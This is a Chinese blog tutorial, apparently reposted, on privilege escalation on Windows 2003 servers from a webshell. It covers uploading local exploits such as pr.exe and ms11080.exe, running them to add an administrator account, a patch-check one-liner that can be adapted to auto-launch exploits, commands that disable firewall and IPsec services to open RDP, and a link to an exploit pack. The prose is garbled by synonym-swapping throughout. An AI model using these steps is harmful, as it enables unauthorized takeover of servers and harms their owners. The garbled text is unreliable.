|
|
|
联系客服020-83701501

常见的服务器溢出提权方法

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
思空见贯的供职器溢出提权方法

0×00 媒介
0×01 找可写目录
0×02 运行exploit提权
0×03 附录

0×00 媒介
溢出马脚就像杯子里装水,水多了杯子装不出来,就会把外表的水溢出来.
而绝对合计机来说合计机有个中央叫缓存区,倒叙的缓存区长度是被其后设定好的,假如用户输出的数据超过了这个缓存区的长度,那么这个倒叙就会溢出了.缓存区溢出马脚主假如由于良多软件不有对缓存区查抄而形成的.

这一章概略便是说利用一些现成的形成溢出马脚的exploit经由运行,把用户从users组或此外琐细用户中汲引到administrators组.

起首asp 网站shell要支持wscript(wscript.shell/shell.application)

一般翻开网站shell外表墟落有组件支持,看到wscript.shell 旁边的勾选上了就支持wscript,当然也有一些网站shell会有诈胡的景象.- -市面上的几款比拟火的网站shell貌似都有这些标题,帮朋友提权他的网站shell有wscript.shell 支持,此后找个目录履行cmd的后果不成,转到我那网站shell上显示没wscript.shell 支持..
大概aspx能挪用.net组件来履行cmd的号令.

这里主要用几款市面上比拟多人利用的windows exploit提权的利用器械.

0×01 找可写目录
这里附上啊D写的asp版本扫描可写目录和欧欧写的aspx扫可写目录,开首附上一款我自己比拟LOVE用往日星外时候的募捐 小手极冷的aspx 经由查注册表此后失掉蹊径,共同啊D的扫可写目录比拟不错.这些器械我们都演示一遍吧.

输出目录,此后点击初阶检测,得出以下后果

蓝色是貌似是代表有定然的权限,定然可写(或是可读),白色是代表文件夹可写,白色的文件呢便是代表谁人文件可写了,彩色是代表不存在该文件夹.
接下来演示一下欧欧写的aspx扫描,比拟复杂,一看就明白了..

输出文件夹蹊径大概盘符0.0,接着点击ScanWrtieable即可.

开首是演示一下小手极冷写的这款经由读取注册内外的软件的蹊径,此后输出注册内外的数据,显示软件安装地点的蹊径..共同啊D的目录读写检测 asp版,梗概快速的找到可写目录。

0×02 运行exploit提权

这里我已经找到了一个可写目录
c:Documents and SettingsAll UsersDocumentsMy MusicSample Playlists012F852
我们上传cmd试试吧.

一些小才智:有些安全软件大概一些规画员会在注册表大概安全策略神马的设置,限定运行exe后缀的文件,无意偶尔候梗概把上传的cmd.exe未便改名字,-0-在网站shell下运行它不管你是不是exe后缀最终但凡以exe文件来运行..

点击网站shell外表的cmd号令

输出我们刚才上传的cmd.exe的蹊径和文件名.勾选WScript.Shell ,我们这里看看我们此刻用户的权限,输出whoami 点击履行.返回了一个静态
nt authoritynetwork service
在第三章《windows2003 网站shell默认权限》里我讲过上面引用第三章
Network Service是Windows 2003中新内置的一个被严格限定的账号。此外,IIS 6.0只容许规画员履行号令行器械,从而抗御号令行器械的恶意操纵。这些筹算上的篡改,都消沉了经由窜伏的马脚攻击供职器的或是性。一切基础筹算上的改 变、一些复杂配置的变更(包含勾销匿名用户向网站供职器的根目录写入权限,和将FTP用户的接见会晤隔离在他们各自的主目录中)都极大地进步了IIS 6.0的安全性。

0.0该用户便是一个users组的,梗概履行一些复杂的号令. 但不能直接net user 增长用户.有些黑客做了后门所以让网站shell在iis下运行有system权限.具体方法参考0×03附录.
我们在运行exploit前一般会输出systeminfo这号令.大概经由盘诘c:windows 里留下的补丁号.log来看看供职器概略打了哪些补丁
.
附上对应补丁号

KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB952004 MS09-012 Pr.exe
KB956572 MS09-012 巴西烤肉
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011 ms11011.exe
KB942831 MS08-005
KB2503665 MS11-046 ms11046.exe
KB2592799 MS11-080 ms11080.exe
0.0没打补丁也.接着在那可读可写可履行的目录下,上传我们的exploit.

履行pr,为何不回显呢?
我在这里解答一下吧,由于上传的文件的蹊径 文件夹外表有 空格c:Documents and SettingsAll UsersDocumentsMy MusicSample Playlists012F852
我们换个蹊径吧
C:RECYCLER

看到不有,有回显了. Pr的操纵方法便是 文件地点的蹊径 + “cmd号令” ps:要把稳有””双引号!!.

C:RECYCLERpr.exe “whoami”
返回数据,system权限0.0.梗概直接增长administrator的用户.

C:RECYCLERpr.exe “net user xiaoguai h4x0er.com /add & net localgroup administrators xiaoguai /add”
增长一个xiaoguai的账号,密码是h4x0er.com,把xiaoguai这个账号增长进administrators这个组外表.

接着我们就搜查一下3389的端口.点击读取注册表,读取HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber
这个键外表的值.

此后就直接3389登陆吧,假如登陆不上的话,参考一下附录下的打算方法.

以刚才增长账号的登陆出来了.
接下来演示一下aspx的网站shell提权,当asp不支持WScript.而支持aspx的剧本时候便梗概试试用aspx来提权.

Aspx 网站shell是挪用.net的组件来运行cmd号令的.

翻开C:RECYCLER目录(该目录可写可读可履行),点击文件规画,浏览ms11080.exe,此后点击上传。
返回File upload success!就阐明上传腐蚀了,0.0我们看看该目录下能否存在ms11080.exe这个文件假如不存在的话,很有或是是被杀毒软件杀掉了.
接下来切换到cmd号令去. 输出
/c C:RECYCLERms11080.exe 当涌现Add to Administrators success
阐明90sec这个账号增长腐蚀了.账号密码但凡90sec.

我们运行net user看看能否增长之去了

我们刚用pr和ms11080增长的账号都在。
Pr和巴西烤肉的操纵方法是一样的,ms11080和ms11046操纵方法也是一样的,上面就不演示了.
提权器械的方法也差不多,不懂的时候梗概去baidu找一下..这里就再也不登陆下来了.

Aspx的网站shell下点击琐细静态,Terminal Port : 即3389的端口,

大概在aspx 网站shell下的注册表盘诘HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber

Aspxspy尚有一个反弹的 端口映照,- -很卡..aspx的shell由于是user权限,所以梗概直接在shell里反弹的。

0×03 附录
1.IIS6.0下将网站shell汲引为system用户权限的方法:进入利用倒叙池-属性-标识:将标识外表的预界说账号设为:当地琐细 (代表网站shell存在system用户权限)大概选用谁人”IWAM_主机名”用户,再用clone5.exe倒叙克隆“IWAM_主机名”用户

2.提权马脚的对应补丁号盘诘cmd版
主动检测补丁的CMD号令,号令比拟复杂,就不标明晰,由于只要一行,所以直接复制到cmd中便梗概履行了,不必要生存为批处置惩罚文件……
提权马脚的对应补丁号盘诘cmd版+加提权器械包:
你梗概把“@echo %i Not Installed!” 换成 “%i.exe Parameters“,便梗概主动提权了……
提权马脚的对应补丁号盘诘cmd版+加提权器械包
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt
接下来形式由90sec的0days批改
这个版本是核老小写的…用的是systeminfo来看装了哪些补丁… 外表的补丁号已经互换过了.systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt
这个是我按照他的号令修改的…是搜查c:windows下安装补丁当前留下的log文件来搜查能否安装了补丁…
dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

3.3389连贯不上的打算方法
假如直间断接连贯不上的话,有或是因而下几种情况以及打算方法

1.远程桌面供职没关闭
梗概把
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
生存成bat文件在cmd下找个可写目录此后以system权限运行.
2.IP策略拦挡
sc stop policyagent
3.windows自带防火墙拦挡
net stop sharedaccess
4.另外防火墙拦挡
tasklist /svc此号令梗概失掉每一个进程中主持的供职
看到哪个不是琐细自带的供职大概正在运行的进程
用ntsd -c q -pn xxx.exe 和 net stop 尚有sc stop 这几个号令以system权限xx掉它.
5.内网
梗概经由lcx等转发器械.

文章中操纵的windows exploit

http://115.com/file/c2wi2jk6#提权器械纠合.rar

91ri.org点评:本文是一篇非常好的科普文 的确纠合了一切此刻有的windows当地提权法子,作者是dis9@小乖 本人梗概多看几遍 多参考参考 我担保对新手朋友们会有帮忙!

本文转自小乖博客 由网络安全攻防研究室(www.91ri.org)静态安全小组征集收拾整顿。

数安新闻+更多

证书相关+更多